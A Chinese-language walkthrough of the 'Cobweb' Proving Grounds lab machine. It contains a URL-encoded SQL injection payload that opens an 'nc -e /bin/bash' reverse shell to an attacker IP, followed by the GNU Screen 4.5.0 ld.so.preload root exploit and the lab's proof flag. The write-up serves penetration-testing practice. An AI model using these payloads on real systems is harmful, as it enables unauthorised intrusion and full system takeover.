Cobweb Intermediate pg walkthrough
源码泄露
可以直接看到源码存在sql注入
反弹shellpayload
http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20
查看具有suid的命令
发现screen 命令存在漏洞GNU Screen 4.5.0 - Local Privilege Escalation
点击查看代码
sh-4.4# find / -perm -u=s -type f 2>/dev/null
/var/tmp/rootshell
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount3
/usr/bin/screen-4.5.0
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/userhelper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/selinux_child
成功提权
bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so rootshell
bash-4.4$ cd /etc
bash-4.4$ unmask 000
bash: unmask: command not found
bash-4.4$ umask 000 # because
bash-4.4$ screen -D -m -L ld.so.preload echo -ne "\x0a/var/tmp/libhax.so"
bash-4.4$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-apache.
bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so rootshell
bash-4.4$ ls -al
total 788
drwxrwxrwt 2 root root 40 Nov 7 07:16 .
drwxr-xr-x. 22 root root 4096 Aug 27 2021 ..
-rwxrwxrwx 1 apache apache 15696 Nov 7 06:57 libhax.so
-rwsr-xr-x 1 root root 785800 Nov 7 07:13 rootshell
bash-4.4$ ./rootshell
sh-4.4# whoami
root
sh-4.4# cd /root
sh-4.4# ls
proof.txt
sh-4.4# cat proof.txt
392388689a0ceba499668648185647f6